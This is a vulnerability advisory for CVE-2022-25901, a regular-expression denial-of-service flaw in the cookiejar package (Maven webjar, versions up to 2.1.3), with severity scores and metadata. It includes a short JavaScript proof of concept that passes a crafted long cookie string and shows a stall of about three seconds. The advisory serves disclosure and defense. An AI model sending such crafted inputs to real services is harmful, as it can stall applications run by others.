CVE-2022-25901 – org.webjars.npm:cookiejar

Package

Manager: maven
Name: org.webjars.npm:cookiejar
Vulnerable Version: >=0 <=2.1.3

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

EPSS: 0.00035 pctl0.08573

Details

cookiejar Regular Expression Denial of Service via Cookie.parse function Versions of the package cookiejar before 2.1.4 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `Cookie.parse` function and other aspects of the API, which use an insecure regular expression for parsing cookie values. Applications could be stalled for extended periods of time if untrusted input is passed to cookie values or attempted to parse from request headers. Proof of concept: ``` ts\nconst { CookieJar } = require("cookiejar"); const jar = new CookieJar(); const start = performance.now(); const attack = "a" + "t".repeat(50_000); jar.setCookie(attack); console.log(`CookieJar.setCookie(): ${performance.now() - start}ms`); ``` ``` CookieJar.setCookie(): 2963.214399999939ms ```

Metadata

Created: 2023-01-18T06:31:03Z
Modified: 2025-02-13T18:36:34Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-h452-7996-h45h/GHSA-h452-7996-h45h.json
CWE IDs: ["CWE-1333"]
Alternative ID: GHSA-h452-7996-h45h
Finding: F211
Auto approve: 1